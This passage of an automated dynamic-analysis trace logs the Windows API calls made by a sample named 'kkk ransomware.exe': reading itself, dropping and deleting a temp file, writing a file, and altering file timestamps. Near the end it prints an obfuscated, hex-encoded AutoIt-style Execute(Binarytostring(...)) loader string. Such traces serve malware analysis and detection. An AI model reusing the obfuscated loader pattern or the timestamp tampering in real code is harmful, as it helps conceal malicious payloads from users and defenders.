lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv", lpFindFileData=0x8cee60 | out: lpFindFileData=0x8cee60*(dwFileAttributes=0x2a64690, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0xa, ftLastAccessTime.dwLowDateTime=0x8, ftLastAccessTime.dwHighDateTime=0x8cee84, ftLastWriteTime.dwLowDateTime=0x4131ac, ftLastWriteTime.dwHighDateTime=0x2a64690, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x778947df, dwReserved1=0xaed212ec, cFileName="`", cAlternateFileName="\x10")) returned 0xffffffff [0081.419] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.419] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 0 [0081.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0081.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x29e0380, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0081.420] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.421] SetLastError (dwErrCode=0x2) [0081.421] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.422] SetLastError (dwErrCode=0x2) [0081.422] GetLastError () returned 0x2 [0081.423] SetLastError (dwErrCode=0x2) [0081.423] GetLastError () returned 0x2 [0081.423] SetLastError (dwErrCode=0x2) [0081.423] GetLastError () returned 0x2 [0081.423] SetLastError (dwErrCode=0x2) [0081.423] GetLastError () returned 0x2 [0081.423] SetLastError (dwErrCode=0x2) [0081.423] GetLastError () returned 0x2 [0081.423] SetLastError (dwErrCode=0x2) [0081.423] GetLastError () returned 0x2 [0081.423] SetLastError (dwErrCode=0x2) [0081.423] GetLastError () returned 0x2 [0081.423] SetLastError (dwErrCode=0x2) [0081.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8ce9a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0081.595] GetFileType (hFile=0x294) returned 0x1 [0081.596] ReadFile (in: hFile=0x294, lpBuffer=0x8beabc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8be9a8, lpOverlapped=0x0 | out: lpBuffer=0x8beabc*, lpNumberOfBytesRead=0x8be9a8*=0x10000, lpOverlapped=0x0) returned 1 [0081.596] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0081.596] SetFilePointer (in: hFile=0x294, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0081.596] ReadFile (in: hFile=0x294, lpBuffer=0x8beabc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8be9a8, lpOverlapped=0x0 | out: lpBuffer=0x8beabc*, lpNumberOfBytesRead=0x8be9a8*=0x10000, lpOverlapped=0x0) returned 1 [0081.596] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0081.596] SetFilePointer (in: hFile=0x294, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0081.596] ReadFile (in: hFile=0x294, lpBuffer=0x8beabc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8be9a8, lpOverlapped=0x0 | out: lpBuffer=0x8beabc*, lpNumberOfBytesRead=0x8be9a8*=0x10000, lpOverlapped=0x0) returned 1 [0081.597] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0081.597] SetFilePointer (in: hFile=0x294, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0081.597] ReadFile (in: hFile=0x294, lpBuffer=0x8beabc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8be9a8, lpOverlapped=0x0 | out: lpBuffer=0x8beabc*, lpNumberOfBytesRead=0x8be9a8*=0x10000, lpOverlapped=0x0) returned 1 [0081.597] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0081.597] SetFilePointer (in: hFile=0x294, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0081.597] ReadFile (in: hFile=0x294, lpBuffer=0x8beabc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8be9a8, lpOverlapped=0x0 | out: lpBuffer=0x8beabc*, lpNumberOfBytesRead=0x8be9a8*=0x10000, lpOverlapped=0x0) returned 1 [0081.597] SetFilePointer (in: hFile=0x294, lDistanceToMove=317460, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d814 [0081.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x2af7338 [0081.598] ReadFile (in: hFile=0x294, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8be98c, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8be98c*=0x1000, lpOverlapped=0x0) returned 1 [0081.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ce9bc | out: lpSystemTimeAsFileTime=0x8ce9bc*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.598] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e814 [0081.598] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\gqrfdkv")) returned 0xffffffff [0081.598] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv", lpFindFileData=0x8cea28 | out: lpFindFileData=0x8cea28*(dwFileAttributes=0x3, ftCreationTime.dwLowDateTime=0x8cea38, ftCreationTime.dwHighDateTime=0x41af1a, ftLastAccessTime.dwLowDateTime=0x2af0894, ftLastAccessTime.dwHighDateTime=0x8cea78, ftLastWriteTime.dwLowDateTime=0x41e2c6, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x41e2bc, nFileSizeLow=0xd1d4ca6d, dwReserved0=0x4900b0, dwReserved1=0x3, cFileName="", cAlternateFileName="")) returned 0xffffffff [0081.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bda9c | out: lpSystemTimeAsFileTime=0x8bda9c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.598] SetFilePointer (in: hFile=0x294, lDistanceToMove=317480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d828 [0081.599] ReadFile (in: hFile=0x294, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd560, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8bd560*=0x200, lpOverlapped=0x0) returned 1 [0081.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.599] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.599] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4da28 [0081.599] SetFilePointer (in: hFile=0x294, lDistanceToMove=317621, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4d8b5 [0081.599] ReadFile (in: hFile=0x294, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd560, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8bd560*=0x200, lpOverlapped=0x0) returned 1 [0081.599] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4dab5 [0081.599] SetFilePointer (in: hFile=0x294, lDistanceToMove=333987, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x518a3 [0081.599] ReadFile (in: hFile=0x294, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd560, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8bd560*=0x200, lpOverlapped=0x0) returned 1 [0081.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.600] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51aa3 [0081.600] SetFilePointer (in: hFile=0x294, lDistanceToMove=334096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51910 [0081.600] ReadFile (in: hFile=0x294, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd560, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8bd560*=0x200, lpOverlapped=0x0) returned 1 [0081.600] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b10 [0081.600] SetFilePointer (in: hFile=0x294, lDistanceToMove=576181, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8cab5 [0081.600] ReadFile (in: hFile=0x294, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd560, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8bd560*=0x200, lpOverlapped=0x0) returned 1 [0081.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.601] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.601] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd54c | out: lpSystemTimeAsFileTime=0x8bd54c*(dwLowDateTime=0x2e39d3c4, dwHighDateTime=0x1d5dff9)) [0081.601] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bd8b0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0081.601] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpPrefixString="aut", uUnique=0x0, lpTempFileName=0x8bdf70 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autABA7.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autaba7.tmp")) returned 0xaba7 [0081.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71c0 [0081.602] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autABA7.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autaba7.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x8bd984, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0081.603] GetFileType (hFile=0x298) returned 0x1 [0081.603] ReadFile (in: hFile=0x294, lpBuffer=0x2af7338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bd9b0, lpOverlapped=0x0 | out: lpBuffer=0x2af7338*, lpNumberOfBytesRead=0x8bd9b0*=0x423, lpOverlapped=0x0) returned 1 [0081.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x29e6058 [0081.603] WriteFile (in: hFile=0x298, lpBuffer=0x29e6058*, nNumberOfBytesToWrite=0x57e, lpNumberOfBytesWritten=0x8bbf34, lpOverlapped=0x0 | out: lpBuffer=0x29e6058*, lpNumberOfBytesWritten=0x8bbf34*=0x57e, lpOverlapped=0x0) returned 1 [0081.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e6058 | out: hHeap=0x2af0000) returned 1 [0081.604] CloseHandle (hObject=0x298) returned 1 [0081.605] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autABA7.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autaba7.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8bd970, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0081.605] GetFileType (hFile=0x298) returned 0x1 [0081.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ec0 [0081.606] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\gqrfdkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x8bd970, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0081.606] GetFileType (hFile=0x29c) returned 0x1 [0081.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x29e6058 [0081.606] ReadFile (in: hFile=0x298, lpBuffer=0x29e6058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bd980, lpOverlapped=0x0 | out: lpBuffer=0x29e6058*, lpNumberOfBytesRead=0x8bd980*=0x57e, lpOverlapped=0x0) returned 1 [0081.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20000) returned 0x2a69f18 [0081.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a89f20 [0081.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a99f28 [0081.607] ReadFile (in: hFile=0x298, lpBuffer=0x2a8a496, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8bd968, lpOverlapped=0x0 | out: lpBuffer=0x2a8a496*, lpNumberOfBytesRead=0x8bd968*=0x0, lpOverlapped=0x0) returned 1 [0081.608] WriteFile (in: hFile=0x29c, lpBuffer=0x2a99f28*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x8bbee4, lpOverlapped=0x0 | out: lpBuffer=0x2a99f28*, lpNumberOfBytesWritten=0x8bbee4*=0x2000, lpOverlapped=0x0) returned 1 [0081.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1000) returned 0x2aa9f30 [0081.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69f18 | out: hHeap=0x2af0000) returned 1 [0081.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a89f20 | out: hHeap=0x2af0000) returned 1 [0081.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a99f28 | out: hHeap=0x2af0000) returned 1 [0081.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e6058 | out: hHeap=0x2af0000) returned 1 [0081.613] CloseHandle (hObject=0x298) returned 1 [0081.613] WriteFile (in: hFile=0x29c, lpBuffer=0x2aa9f30*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x8bbf1c, lpOverlapped=0x0 | out: lpBuffer=0x2aa9f30*, lpNumberOfBytesWritten=0x8bbf1c*=0xc4, lpOverlapped=0x0) returned 1 [0081.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f30 | out: hHeap=0x2af0000) returned 1 [0081.614] CloseHandle (hObject=0x29c) returned 1 [0081.615] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\autABA7.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\autaba7.tmp")) returned 1 [0081.616] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\gqrfdkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0081.616] SetFileTime (hFile=0x29c, lpCreationTime=0x8bdaf8, lpLastAccessTime=0x0, lpLastWriteTime=0x8bdb00) returned 1 [0081.616] CloseHandle (hObject=0x29c) returned 1 [0081.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7338 | out: hHeap=0x2af0000) returned 1 [0081.617] CloseHandle (hObject=0x294) returned 1 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64588 | out: hHeap=0x2af0000) returned 1 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645a0 | out: hHeap=0x2af0000) returned 1 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0081.617] PeekMessageW (in: lpMsg=0x8cf7b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf7b0) returned 0 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03c0 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53628 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64558 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0320 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53858 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02c0 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53ab0 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644e0 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645e8 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e02b0 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53920 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644c8 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0470 [0081.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0350 [0081.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645e8 | out: hHeap=0x2af0000) returned 1 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64690 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e03f0 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64648 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11b) returned 0x2a68410 [0081.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11c) returned 0x2a68538 [0081.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0430 [0081.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x238) returned 0x29f7258 [0081.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x2a68538, cbMultiByte=284, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 284 [0081.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x238) returned 0x29f7498 [0081.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x2a68538, cbMultiByte=284, lpWideCharStr=0x29f7498, cchWideChar=284 | out: lpWideCharStr="Execute(Binarytostring('0x457865637574652842696E617279746F737472696E67282730783533373437323639364536373533373036433639373432383436363936433635353236353631363432383234343133343333333033303330333033353434333333313733374135463239324332373231343433343336343336463237324333313239272929'))") returned 284 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7498 | out: hHeap=0x2af0000) returned 1 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64600 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68538 | out: hHeap=0x2af0000) returned 1 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0430 | out: hHeap=0x2af0000) returned 1 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68410 | out: hHeap=0x2af0000) returned 1 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64648 | out: hHeap=0x2af0000) returned 1 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64630 | out: hHeap=0x2af0000) returned 1 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03f0 | out: hHeap=0x2af0000) returned 1 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68410 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0370 [0081.621] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64630 [0081.621] RtlAllocateHeap 